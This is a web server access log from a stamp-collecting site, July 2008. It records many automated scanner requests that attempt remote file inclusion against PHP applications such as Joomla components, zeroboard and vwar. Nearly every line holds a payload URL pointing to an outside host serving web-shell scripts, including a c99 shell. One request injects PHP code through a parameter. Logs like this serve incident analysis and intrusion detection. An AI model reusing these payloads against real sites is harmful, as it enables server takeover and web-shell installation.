72.29.87.80 - - [20/Jul/2008:17:00:52 -0700] "GET /logs/access_080407.log//skin/zero_vote/error.php?dir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:17:00:53 -0700] "GET //skin/zero_vote/error.php?dir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:17:00:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
74.200.223.106 - - [20/Jul/2008:17:01:29 -0700] "GET /logs/access_080407.log//skin/zero_vote/error.php?dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.223.106 - - [20/Jul/2008:17:01:29 -0700] "GET /logs/access_080407.log//skin/zero_vote/error.php?dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.223.106 - - [20/Jul/2008:17:01:29 -0700] "GET //skin/zero_vote/error.php?dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.223.106 - - [20/Jul/2008:17:01:29 -0700] "GET //skin/zero_vote/error.php?dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.223.106 - - [20/Jul/2008:17:01:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.223.106 - - [20/Jul/2008:17:01:29 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.225.192.14 - - [20/Jul/2008:17:03:21 -0700] "GET /logs/access_080421.log//skin/zero_vote/login.php?dir=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.77.135.204 - - [20/Jul/2008:17:03:21 -0700] "GET /logs/access_080428.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.195.37.97 - - [20/Jul/2008:17:04:20 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
200.29.4.54 - - [20/Jul/2008:17:05:35 -0700] "GET /logs/access_080331.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:17:05:46 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:17:05:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
168.209.97.42 - - [20/Jul/2008:17:07:04 -0700] "GET /logs//index.php?config=1&base_datapath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
168.209.97.42 - - [20/Jul/2008:17:07:04 -0700] "GET //index.php?config=1&base_datapath=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
77.222.40.49 - - [20/Jul/2008:17:07:06 -0700] "GET /logs/access_080421.log//skin/zero_vote/login.php?dir=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.125.201.18 - - [20/Jul/2008:17:09:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
75.125.201.18 - - [20/Jul/2008:17:09:12 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
194.186.45.242 - - [20/Jul/2008:17:09:49 -0700] "GET /logs/access_080623.log///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.186.45.242 - - [20/Jul/2008:17:09:49 -0700] "GET ///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.186.45.242 - - [20/Jul/2008:17:09:49 -0700] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:17:10:58 -0700] "GET /logs/access_080428.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.186.45.242 - - [20/Jul/2008:17:12:18 -0700] "GET ///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.186.45.242 - - [20/Jul/2008:17:12:49 -0700] "GET /logs/access_080609.log///tools/send_reminders.php?noSet=0&includedir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:14:37 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:14:50 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:14:50 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:14:56 -0700] "GET /logs/access_080602.log/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:16:09 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:16:10 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:16:11 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:16:17 -0700] "GET /logs/access_080602.log/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
218.38.12.93 - - [20/Jul/2008:17:16:23 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.247.226.253 - - [20/Jul/2008:17:17:04 -0700] "GET /logs/access_080407.log//skin/zero_vote/ask_password.php?dir=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.247.226.253 - - [20/Jul/2008:17:17:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.247.226.253 - - [20/Jul/2008:17:17:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:17:45 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:17:45 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:17:47 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:17:51 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:17:51 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:17:51 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:17:51 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
207.44.230.33 - - [20/Jul/2008:17:18:00 -0700] "GET /logs/access_080421.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.44.230.33 - - [20/Jul/2008:17:18:00 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.44.230.33 - - [20/Jul/2008:17:18:00 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [20/Jul/2008:17:18:19 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [20/Jul/2008:17:18:20 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [20/Jul/2008:17:18:20 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [20/Jul/2008:17:18:28 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.226.64.33 - - [20/Jul/2008:17:18:42 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.226.64.33 - - [20/Jul/2008:17:18:42 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.226.64.33 - - [20/Jul/2008:17:18:42 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.230.86.116 - - [20/Jul/2008:17:18:43 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.230.86.116 - - [20/Jul/2008:17:18:43 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.230.86.116 - - [20/Jul/2008:17:18:43 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.230.86.116 - - [20/Jul/2008:17:18:43 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
66.226.64.33 - - [20/Jul/2008:17:18:52 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
205.234.252.183 - - [20/Jul/2008:17:19:12 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [20/Jul/2008:17:19:12 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [20/Jul/2008:17:19:12 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:19:14 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:19:14 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:19:14 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.252.183 - - [20/Jul/2008:17:19:18 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:19:21 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.221.130.8 - - [20/Jul/2008:17:19:30 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
77.221.130.8 - - [20/Jul/2008:17:19:30 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
77.221.130.8 - - [20/Jul/2008:17:19:31 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
77.221.130.8 - - [20/Jul/2008:17:19:38 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:19:43 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:19:44 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:19:44 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:19:44 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:19:45 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:19:45 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.19.144.26 - - [20/Jul/2008:17:19:47 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [20/Jul/2008:17:19:48 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [20/Jul/2008:17:19:49 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [20/Jul/2008:17:20:00 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:20:10 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.2.100.138 - - [20/Jul/2008:17:20:10 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
211.247.226.253 - - [20/Jul/2008:17:20:16 -0700] "GET /logs/access_080526.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.247.226.253 - - [20/Jul/2008:17:20:17 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.247.226.253 - - [20/Jul/2008:17:20:17 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:21:02 -0700] "GET /logs/access_080630.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:21:02 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:21:07 -0700] "GET /logs/access_080630.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:21:07 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:21:07 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:21:15 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.64.48.146 - - [20/Jul/2008:17:22:16 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.64.48.146 - - [20/Jul/2008:17:22:16 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.64.48.146 - - [20/Jul/2008:17:22:16 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:22:38 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:22:38 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
69.64.48.146 - - [20/Jul/2008:17:22:39 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
211.247.226.253 - - [20/Jul/2008:17:22:39 -0700] "GET /logs/access_080519.log//skin/zero_vote/ask_password.php?dir=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:22:42 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:22:42 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:23:23 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.198.149.178 - - [20/Jul/2008:17:23:44 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
